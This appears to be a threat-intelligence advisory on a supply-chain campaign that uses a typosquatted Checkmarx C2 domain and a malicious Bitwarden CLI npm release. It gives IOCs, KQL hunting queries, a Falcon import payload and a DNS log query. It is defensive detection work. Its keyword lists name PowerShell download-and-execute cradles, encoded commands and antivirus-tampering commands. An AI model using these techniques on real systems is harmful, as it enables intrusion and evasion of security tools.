Git history of .github/workflows/ changes across all repositories for commits made during the TeamPCP exposure window (via `git log --all -p --diff-filter=AM --since=<campaign-start> -- .github/workflows/`) — this surfaces injected workflow steps, modified secrets contexts, and any backdoor pipeline additions made using the compromised Checkmarx distribution identity's push access
Detection Guidance
Primary IOC: C2 domain audit.checkmarx[.]cx, block and alert on all DNS queries and outbound HTTP/S connections to this domain across network, endpoint, and CI/CD environments.
Secondary IOC: npm package @bitwarden/cli at version 2026.4.0, scan all package-lock.json, yarn.lock, and pnpm-lock.yaml files across repositories for this exact version string.
Behavioral indicators: unexpected GitHub Actions workflow modifications (new steps added to existing workflows, especially those referencing external actions or secrets); CI/CD service account calls to AWS SSM GetParameter, Azure Key Vault GetSecret, or GCP Secret Manager AccessSecretVersion outside of expected job patterns; new GitHub repository collaborators or deploy keys added following a pipeline run.
Log sources to query: GitHub Actions audit log (workflow_run events, push events on .github/workflows/), AWS CloudTrail (ssm:GetParameter, secretsmanager:GetSecretValue), Azure Monitor (KeyVaultAccessPolicy, SecretGet), GCP Audit Logs (secretmanager.versions.access), Docker Hub pull history, endpoint DNS logs, and npm audit output for affected package versions.
Indicators of Compromise (3)
DOMAIN: audit.checkmarx[.]cx (confidence HIGH). C2 infrastructure for TeamPCP Shai-Hulud Wave 3; typosquatted domain impersonating legitimate Checkmarx vendor infrastructure; used across all attack vectors.
URL: https://audit.checkmarx[.]cx (confidence HIGH). C2 base URL; block all outbound connections and DNS resolution to this host.
PACKAGE: npm:@bitwarden/cli@2026.4.0 (confidence HIGH). Malicious npm package impersonating the legitimate Bitwarden CLI; version 2026.4.0 is the confirmed malicious release identified in this campaign. The feed exports this as a URL-type indicator, but it is a package identifier: match it in lockfiles and install logs, not in network telemetry.
Platform Playbooks: Microsoft Sentinel / Defender, CrowdStrike Falcon, AWS Security
Microsoft coverage by license tier:
Microsoft 365 E3 (3 log sources): basic identity and audit; no endpoint advanced hunting. Defender for Endpoint requires a separate P1/P2 license.
Microsoft 365 E5 (18 log sources): full Defender suite (Endpoint P2, Identity, Office 365 P2, Cloud App Security); advanced hunting across all workloads.
E5 + Sentinel (27 log sources): all E5 tables plus SIEM data (CEF, Syslog, Windows Security Events, Threat Intelligence); analytics rules, playbooks, workbooks.
IOC Detection Queries (2)
Domain indicator: connections to the C2 host (KQL, Defender for Endpoint DeviceNetworkEvents).
// Threat: TeamPCP Shai-Hulud Wave 3: Checkmarx Distribution Infrastructure Compromised via
let malicious_domains = dynamic(["audit.checkmarx.cx"]);
DeviceNetworkEvents
| where Timestamp > ago(30d)
| where RemoteUrl has_any (malicious_domains)
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort,
InitiatingProcessFileName, InitiatingProcessCommandLine
| sort by Timestamp desc
URL and package indicators (KQL, Defender for Endpoint). RemoteUrl normally holds the host name, so the C2 URL is matched by host; the npm indicator is not a network artifact and is hunted in process command lines instead.
// Threat: TeamPCP Shai-Hulud Wave 3: Checkmarx Distribution Infrastructure Compromised via
// RemoteUrl normally holds the host, so match the C2 host; the npm IOC is not a network
// indicator, so hunt it in process command lines (npm/npx installs) instead.
let c2_hosts = dynamic(["audit.checkmarx.cx"]);
let bad_package = "@bitwarden/cli@2026.4.0";
union
(DeviceNetworkEvents
| where Timestamp > ago(30d) and RemoteUrl has_any (c2_hosts)
| project Timestamp, DeviceName, Indicator = RemoteUrl, InitiatingProcessFileName, InitiatingProcessCommandLine),
(DeviceProcessEvents
| where Timestamp > ago(30d) and ProcessCommandLine contains bad_package
| project Timestamp, DeviceName, Indicator = bad_package, InitiatingProcessFileName, InitiatingProcessCommandLine)
| sort by Timestamp desc
MITRE ATT&CK Hunting Queries (8)
Sentinel rule: Suspicious PowerShell command line
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe")
| where ProcessCommandLine has_any ("-enc", "-nop", "bypass", "hidden", "downloadstring", "invoke-expression", "iex", "frombase64", "new-object net.webclient")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Encoded command execution
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine matches regex @"[A-Za-z0-9+/]{50,}={0,2}"
or ProcessCommandLine has_any ("-enc ", "-encodedcommand", "frombase64string", "certutil -decode")
| where FileName in~ ("powershell.exe", "pwsh.exe", "cmd.exe", "certutil.exe")
| project Timestamp, DeviceName, FileName, ProcessCommandLine, AccountName
| sort by Timestamp desc
Sentinel rule: Sign-ins from unusual locations
SigninLogs
| where TimeGenerated > ago(7d)
| where ResultType == 0
| summarize Locations = make_set(Location), LoginCount = count(), DistinctIPs = dcount(IPAddress) by UserPrincipalName
| where array_length(Locations) > 3 or DistinctIPs > 5
| sort by DistinctIPs desc
Sentinel rule: Persistence via registry / startup
DeviceRegistryEvents
| where Timestamp > ago(7d)
| where ActionType in ("RegistryValueSet", "RegistryKeyCreated")
| where RegistryKey has_any ("\\CurrentVersion\\Run", "\\CurrentVersion\\RunOnce", "\\Winlogon\\", "\\Services\\")
| where RegistryValueData has_any (".exe", ".dll", ".bat", ".ps1", ".vbs", "cmd", "powershell", "http")
| project Timestamp, DeviceName, RegistryKey, RegistryValueName, RegistryValueData, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Security tool tampering
DeviceProcessEvents
| where Timestamp > ago(7d)
| where ProcessCommandLine has_any (
"Set-MpPreference", "DisableRealtimeMonitoring",
"net stop", "sc stop", "sc delete", "taskkill /f",
"Add-MpPreference -ExclusionPath"
)
| where ProcessCommandLine has_any ("defender", "sense", "security", "antivirus", "firewall", "crowdstrike", "sentinel")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Suspicious scheduled task creation
DeviceProcessEvents
| where Timestamp > ago(7d)
| where FileName =~ "schtasks.exe"
| where ProcessCommandLine has "/create"
| where ProcessCommandLine has_any ("/sc minute", "/sc hourly", "powershell", "cmd /c", "http", "\\\\", "frombase64")
| project Timestamp, DeviceName, ProcessCommandLine, AccountName, InitiatingProcessFileName
| sort by Timestamp desc
Sentinel rule: Unusual C2 communication patterns
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemotePort in (80, 443, 8080, 8443)
| where InitiatingProcessFileName !in~ ("chrome.exe", "msedge.exe", "firefox.exe", "teams.exe", "outlook.exe", "svchost.exe")
| summarize Connections = count() by DeviceName, RemoteIP, InitiatingProcessFileName
| where Connections > 50
| sort by Connections desc
Sentinel rule: Privilege escalation / account modification
AuditLogs
| where TimeGenerated > ago(7d)
| where OperationName has_any ("Add member to role", "Add app role assignment", "Add owner to application", "Reset user password")
| extend Target = tostring(TargetResources[0].userPrincipalName), Actor = tostring(InitiatedBy.user.userPrincipalName)
| project TimeGenerated, OperationName, Actor, Target, Result
| sort by TimeGenerated desc
Falcon API IOC Import Payload (1 indicator)
POST to /indicators/entities/iocs/v1. Weak/benign indicators pre-filtered; expiration set to 90 days. The value must be submitted undefanged (audit.checkmarx.cx): Falcon matches the literal string, so the defanged form used elsewhere on this page would never fire.
[
{
"type": "domain",
"value": "audit.checkmarx.cx",
"source": "SCC Threat Intel",
"description": "C2 infrastructure for TeamPCP Shai-Hulud Wave 3; typosquatted domain impersonating legitimate Checkmarx vendor infrastructure; used across all attack vectors",
"severity": "high",
"action": "detect",
"platforms": [
"windows",
"mac",
"linux"
],
"applied_globally": true,
"expiration": "2026-07-24T00:00:00Z"
}
]
Route 53 DNS — Malicious Domain Resolution
CloudWatch Logs Insights over Route 53 Resolver query logs. The name field is query_name and is logged with a trailing dot, so match with a regex rather than an exact list; the pattern below covers any host under the typosquatted registered domain.
# any host under checkmarx.cx, with or without the trailing dot
fields @timestamp, query_name, srcaddr, rcode
| filter query_name like /(^|\.)checkmarx\.cx\.?$/
| sort @timestamp desc
| limit 200
Compliance Framework Mappings
MITRE ATT&CK: T1059.004, T1555, T1059.007, T1553, T1027, T1552.004 (+16 not shown)
NIST SP 800-53: CM-7, SI-3, SI-4, AC-3, SA-9, SR-3 (+4 not shown)
MITRE ATT&CK Mapping
T1195.001 Compromise Software Dependencies and Development Tools (initial-access)
T1195.002 Compromise Software Supply Chain (initial-access)
T1053 Scheduled Task/Job (execution)
T1176 Software Extensions (persistence)
T1547 Boot or Logon Autostart Execution (persistence)
T1543 Create or Modify System Process (persistence)
T1098 Account Manipulation (persistence)
T1553 Subvert Trust Controls (defense-evasion)
T1027 Obfuscated Files or Information (defense-evasion)
T1562.001 Disable or Modify Tools (defense-evasion)
T1612 Build Image on Host (defense-evasion)
T1555 Credentials from Password Stores (credential-access)
T1552.001 Credentials In Files (credential-access)
T1567 Exfiltration Over Web Service (exfiltration)
T1567.001 Exfiltration to Code Repository (exfiltration)
Guidance Disclaimer
The analysis, framework mappings, and incident response recommendations in this intelligence item are derived from established industry standards including NIST SP 800-61, NIST SP 800-53, CIS Controls v8, MITRE ATT&CK, and other recognized frameworks. This content is provided as supplemental intelligence guidance only and does not constitute professional incident response services. Organizations should adapt all recommendations to their specific environment, risk tolerance, and regulatory requirements. This material is not a substitute for your organization's official incident response plan, legal counsel, or qualified security practitioners.